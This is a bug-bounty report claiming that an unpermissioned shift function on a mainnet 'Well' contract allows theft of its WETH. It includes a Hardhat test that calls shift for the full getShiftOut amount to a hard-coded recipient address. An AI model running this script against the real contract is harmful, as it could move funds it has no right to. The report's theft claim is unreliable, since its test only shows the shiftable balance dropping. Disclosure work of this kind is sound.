Report ID
#24867
Report type
Smart Contract
Has PoC?
Yes
Target
https://etherscan.io/address/0xBEA0e11282e2bB5893bEcE110cF199501e872bAd
Impacts
Direct theft of any user funds, whether at-rest or in-motion, other than unclaimed yield
Description
Bug Description: the smart contract will permanently lose funds.
Impact: loss of funds.
Proof of concept
Step 1: call the shift function of the smart contract; the function executes without any permission check. Parameters: 1. tokenOut, the token's smart contract address; 2. minAmountOut, the amount of tokens to send out (the PoC passes the full getShiftOut value); 3. recipient, the address the tokens are sent to.
Step 2: call the getShiftOut function of the smart contract to check the contract's stored balance of that token; this function also executes without permission. Parameter: 1. tokenOut, the token's smart contract address. The WETH held by the contract is gone.
Code (Hardhat/Mocha test run against a mainnet fork; the "Well" artifact must be compiled in the project so getContractAt can resolve the ABI):

const { expect } = require("chai");
const { ethers } = require("hardhat");

const Well_Address = "0xBEA0e11282e2bB5893bEcE110cF199501e872bAd";

it("Should steal tokens", async function () {
  // any unprivileged account; no role or ownership is required to call shift
  const [attacker] = await ethers.getSigners();
  const well = await ethers.getContractAt("Well", Well_Address);

  // recipient of the shifted-out tokens and the WETH token address
  const user = "0x7dA1ebA26f059EB3184694AE64b2bb92388d91Cc";
  const WETH = "0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2";

  // Step 2 (before): WETH the Well reports as available to shift out
  const token_before = await well.getShiftOut(WETH);
  console.log(`token before: ${ethers.utils.formatEther(token_before)} WETH`);

  // Step 1: shift(tokenOut, minAmountOut, recipient) with the full amount to the recipient
  await well.connect(attacker).shift(WETH, token_before, user);

  // Step 2 (after): the Well's shiftable WETH balance has dropped
  const token_after = await well.getShiftOut(WETH);
  console.log(`token after: ${ethers.utils.formatEther(token_after)} WETH`);

  // BigNumber comparison; asserts the reported outcome that WETH left the contract
  expect(token_after.lt(token_before)).to.equal(true);
});